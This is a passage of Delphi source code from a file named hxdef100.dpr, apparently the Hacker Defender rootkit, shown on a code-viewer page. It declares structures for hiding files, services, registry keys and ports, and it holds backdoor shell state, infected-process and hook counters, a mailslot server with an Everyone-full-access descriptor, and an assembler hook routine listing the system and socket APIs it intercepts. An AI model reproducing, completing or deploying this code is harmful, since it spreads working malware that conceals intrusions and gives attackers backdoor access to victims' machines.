📄 hxdef100.dpr
字号:
TNtQueryObject=function(AObjectHandle:THandle;AObjectInformationClass:Cardinal;AObjectInformation:Pointer;AObjectInformationLength:Cardinal;AReturnLength:PCardinal):Cardinal; stdcall;
TNtQueryVolumeInformationFile=function(AFileHandle:THandle;AIoStatusBlock:Pointer;AVolumeInformation:Pointer;AVolumeInformationLength:Cardinal;AVolumeInformationClass:Cardinal):Cardinal; stdcall;
TRtlAnsiStringToUnicodeString=function(ADestinationString:PUnicodeString;ASourceString:PAnsiString;AAllocateDestinationString:Boolean):Cardinal; stdcall;
TRtlUnicodeStringToAnsiString=function(ADestinationString:PAnsiString;ASourceString:PUnicodeString;AAllocateDestinationString:Boolean):Cardinal; stdcall;
TRtlFreeAnsiString=function(AAnsiString:PAnsiString):Cardinal; stdcall;
TRtlFreeUnicodeString=function(AUnicodeString:PUnicodeString):Cardinal; stdcall;
TRtlInitUnicodeString=function(ADestinationString:PUnicodeString;ASourceString:PWideChar):Cardinal; stdcall;
const
INTERCOM_BUFFER_SIZE=SizeOf(TIntercomBuffer);
ACL_SIZE=SizeOf(ACL)+SizeOf(ACCESS_ALLOWED_ACE)-SizeOf(DWORD);
INVALID_SOCKET=TSocket(not(0));
var
HiddenArray,RootArray,ServicesArray,RegKeysArray,RegValuesArray:array[0..65535] of Char;
FreeSpaceArray:array[0..26*40-1] of Char;
HiddenPortsArray:array[0..2*65536-1] of Char;
PasswordArray:array[0..3] of Char;
BytesRead,BytesWritten,HiddenArraySize,RootArraySize,ServicesArraySize,RegKeysArraySize,
RegValuesArraySize,PasswordArraySize,FreeSpaceArraySize,HiddenPortsArraySize,MessageSize,TID:Cardinal;
ServerMailslotHandle,ServerMailslotFileHandle,IniMappingHandle:THandle;
GetProcAddressAddr,GetModuleHandleAAddr,IniMappingAddr:Pointer;
PB:PByte;
InfectedProcessCount,MsgSender,RealHookedCount,SomeCreateProcess:Integer;
Done,IsService,MainLoopRunning:Boolean;
FIni:TextFile;
MailslotName,IniFile:string;
IntercomBuffer:TIntercomBuffer;
BasicOffset:Cardinal; //this is static delphi address for its consts
//but we need dynamical, NO static
//so we will subtract this magic number every time we need
//e.g. =$00404EAB
DispatchTable:array[0..1] of TServiceTableEntry;
ServiceStatusHandle:SERVICE_STATUS_HANDLE;
ServiceStatus:TServiceStatus;
StartupFlags:TStartupFlags;
BackdoorVars:record
BSHRun:Boolean;
BackdoorMailslotName,SrvMailslotName:string;
SrvMailslotHandle,BackdoorMailslotHandle,InputHandle,OutputHandle:THandle;
FirstCoords,SecondCoords:TCoord;
FirstRect:TSmallRect;
FullConsoleScreen:TConsoleScreen;
ShellProcess:Cardinal;
end;
BackdoorShell,ServiceName,ServiceDisplayName,ServiceDescription,DriverName,DriverFileName,
FileMappingName,ServerMailslotName:string;
NtQuerySystemInformation:TNtQuerySystemInformation;
NtLoadDriver:TNtLoadDriver;
NtQueryObject:TNtQueryObject;
NtQueryVolumeInformationFile:TNtQueryVolumeInformationFile;
RtlAnsiStringToUnicodeString:TRtlAnsiStringToUnicodeString;
RtlUnicodeStringToAnsiString:TRtlUnicodeStringToAnsiString;
RtlFreeAnsiString:TRtlFreeAnsiString;
RtlFreeUnicodeString:TRtlFreeUnicodeString;
RtlInitUnicodeString:TRtlInitUnicodeString;
Shortcuts:array[0..ShortcutCount-1] of record
OrgStr,NewStr:string;
end;
Argv1:string;
Argc:Cardinal;
{$IFDEF LOGGING}
procedure Log(a:string;e:Boolean=True); stdcall;
var
f:textfile;
begin
assignfile(f,HxdefLogFileName);
if fileexists(HxdefLogFileName) then append(f)
else rewrite(f);
write(f,'main: ');
write(f,a);
if e then writeln(f);
closefile(f);
end;
procedure LogUnicodeString(a:PUnicodeString;e:boolean); stdcall;
var
f:textfile;
i,l:integer;
buffer:array[0..255] of char;
begin
assignfile(f,HxdefLogFileName);
if fileexists(HxdefLogFileName) then append(f)
else rewrite(f);
l:=a^.Length;
copymemory(@buffer,a^.Buffer,l);
for i:=0 to l div 2-1 do
write(f,buffer[i*2]);
if e then writeln(f);
closefile(f);
end;
procedure LogInt(a:Integer;e:boolean); stdcall;
var
f:textfile;
begin
assignfile(f,HxdefLogFileName);
if fileexists(HxdefLogFileName) then append(f)
else rewrite(f);
write(f,a);
if e then writeln(f);
closefile(f);
end;
procedure LogChar(a:char); stdcall;
var
f:textfile;
begin
assignfile(f,HxdefLogFileName);
if fileexists(HxdefLogFileName) then append(f)
else rewrite(f);
write(f,a);
closefile(f);
end;
{$ENDIF}
procedure Main; forward;
function DirectHook(APID,AOperation:Cardinal):Cardinal; stdcall; assembler; forward;
procedure DirectHookEnd; assembler; forward;
procedure SendMainLoopTermination(AUninstall:Boolean); forward;
function CreateEveryoneSecAttr(var ASecAttr:TSecurityAttributes;var ASecDesc:TSecurityDescriptor;var APDAcl:PAcl):Boolean;
var
LDAcl:PAcl;
LEveryoneSid:PSID;
LAclSize:Cardinal;
begin
Result:=False;
if not AllocateAndInitializeSid(SECURITY_WORLD_SID_AUTHORITY,1,SECURITY_WORLD_RID,0,0,0,0,0,0,0,LEveryoneSid) then Exit;
LAclSize:=SizeOf(ACL)+SizeOf(ACCESS_ALLOWED_ACE)+GetLengthSid(LEveryoneSid)-SizeOf(DWORD);
LDAcl:=VirtualAlloc(nil,LAclSize,MEM_COMMIT,PAGE_READWRITE);
if LDAcl=nil then Exit
else APDAcl:=LDAcl;
if not InitializeAcl(LDAcl^,LAclSize,ACL_REVISION) then Exit;
if not AddAccessAllowedAce(LDAcl^,ACL_REVISION,GENERIC_ALL,LEveryoneSid) then Exit;
if not InitializeSecurityDescriptor(@ASecDesc,SECURITY_DESCRIPTOR_REVISION) then Exit;
if not SetSecurityDescriptorDacl(@ASecDesc,True,LDAcl,False) then Exit;
with ASecAttr do
begin
lpSecurityDescriptor:=@ASecDesc;
nLength:=SizeOf(ASecAttr);
bInheritHandle:=False;
end;
Result:=True;
end;
function CreateServerMailslot(AMailslotName:string;var APDAcl:PAcl):Boolean;
var
LSecAttr:TSecurityAttributes;
LSecDesc:TSecurityDescriptor;
begin
Result:=False;
if not CreateEveryoneSecAttr(LSecAttr,LSecDesc,APDAcl) then Exit;
ServerMailslotHandle:=CreateMailslot(PChar(AMailslotName),0,INFINITE,@LSecAttr);
ServerMailslotFileHandle:=CreateFile(PChar(AMailslotName),GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,
nil,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
Result:=not ((ServerMailslotHandle=INVALID_HANDLE_VALUE) or (ServerMailslotFileHandle=INVALID_HANDLE_VALUE));
end;
procedure CheckUniqInstance;
var
LFile:THandle;
begin
LFile:=CreateFile(PChar(ServerMailslotName),GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,nil,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
if LFile<>INVALID_HANDLE_VALUE then
begin
CloseHandle(LFile);
if StartupFlags<>sfInstallOnly then Halt;
end;
end;
function DirectHook(APID,AOperation:Cardinal):Cardinal; stdcall; assembler;
asm
pop ebp //delphi call
jmp @DirectHook_begin
@Body:
@GetAddr:
call @GetBaseAddr
@GetBaseAddr:
pop eax
db 02Dh //sub eax
@GetBaseAddr_BasicOffset:
db 000h,000h,000h,000h //BasicOffset
ret
@FileMappingName : db 041h,041h,041h,000h,000h,000h,000h,000h
db 000h,000h,000h,000h,000h,000h,000h,000h
db 000h,000h,000h,000h,000h,000h,000h,000h
db 000h,000h,000h,000h,000h,000h,000h,000h
db 000h
@cMainProcessPID : db 000h,000h,000h,000h
@DLLNames :
@Kernel32_DLL :
@Kernel32DLLName : db 'kernel32.dll' ,000h
@Kernel_API :
@SetLastErrorName : db 'SetLastError' ,000h
@CreateMailslotAName : db 'CreateMailslotA' ,000h
@GetMailslotInfoName : db 'GetMailslotInfo' ,000h
@WriteFileName : db 'WriteFile' ,000h
@ReadFileName : db 'ReadFile' ,000h
@CloseHandleName : db 'CloseHandle' ,000h
@GetEnvironmentVariableWName : db 'GetEnvironmentVariableW' ,000h
@GetModuleFileNameAName : db 'GetModuleFileNameA' ,000h
@DuplicateHandleName : db 'DuplicateHandle' ,000h
@CreateProcessAName : db 'CreateProcessA' ,000h
@ExitThreadName : db 'ExitThread' ,000h
@CreateThreadName : db 'CreateThread' ,000h
@CreatePipeName : db 'CreatePipe' ,000h
@PeekNamedPipeName : db 'PeekNamedPipe' ,000h
@WaitForMultipleObjectsName : db 'WaitForMultipleObjects' ,000h
@TerminateThreadName : db 'TerminateThread' ,000h
@TerminateProcessName : db 'TerminateProcess' ,000h
@DisconnectNamedPipeName : db 'DisconnectNamedPipe' ,000h
@IsBadReadPtrName : db 'IsBadReadPtr' ,000h
@OpenProcessName : db 'OpenProcess' ,000h
@LocalAllocName : db 'LocalAlloc' ,000h
@LocalFreeName : db 'LocalFree' ,000h
@GetLastErrorName : db 'GetLastError' ,000h
@Advapi32_DLL :
@Advapi32DLLName : db 'advapi32.dll' ,000h
@Advapi_API :
@EnumServiceGroupWName : db 'EnumServiceGroupW' ,000h
@EnumServicesStatusAName : db 'EnumServicesStatusA' ,000h
@EnumServicesStatusExWName : db 'EnumServicesStatusExW' ,000h
@EnumServicesStatusExAName : db 'EnumServicesStatusExA' ,000h
{new 078}
@AllocateAndInitializeSidName : db 'AllocateAndInitializeSid' ,000h
@GetLengthSidName : db 'GetLengthSid' ,000h
@InitializeAclName : db 'InitializeAcl' ,000h
@AddAccessAllowedAceName : db 'AddAccessAllowedAce' ,000h
@InitializeSecurityDescriptorName : db 'InitializeSecurityDescriptor' ,000h
@SetSecurityDescriptorDaclName : db 'SetSecurityDescriptorDacl' ,000h
{/new 078}
@WS2_32_DLL :
@WS2_32DLLName : db 'ws2_32.dll' ,000h
@WS2_32_API :
@sendName : db 'send' ,000h
@recvName : db 'recv' ,000h
@WSARecvName : db 'WSARecv' ,000h
@WSAGetLastErrorName : db 'WSAGetLastError' ,000h
@WSAEventSelectName : db 'WSAEventSelect' ,000h
@WSAIoctlName : db 'WSAIoctl' ,000h
@WSASocketAName : db 'WSASocketA' ,000h
@WSAConnectName : db 'WSAConnect' ,000h
@WSACreateEventName : db 'WSACreateEvent' ,000h
@WSAWaitForMultipleEventsName : db 'WSAWaitForMultipleEvents' ,000h
@WSAEnumNetworkEventsName : db 'WSAEnumNetworkEvents' ,000h
@closesocketName : db 'closesocket' ,000h
@User32_DLL :
@User32DLLName : db 'user32.dll' ,000h
@User32_API :
@PeekMessageAName : db 'PeekMessageA' ,000h
@NTDLL_DLL :
@NTDLLDLLName : db 'ntdll.dll' ,000h
@NTDLL_API :
@NtQuerySystemInformationName : db 'NtQuerySystemInformation' ,000h
@NtQueryDirectoryFileName : db 'NtQueryDirectoryFile' ,000h
@NtVdmControlName : db 'NtVdmControl' ,000h
@NtQueryObjectName : db 'NtQueryObject' ,000h
@NtQueryInformationThreadName : db 'NtQueryInformationThread' ,000h
@NtResumeThreadName : db 'NtResumeThread' ,000h
@NtSuspendThreadName : db 'NtSuspendThread' ,000h
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -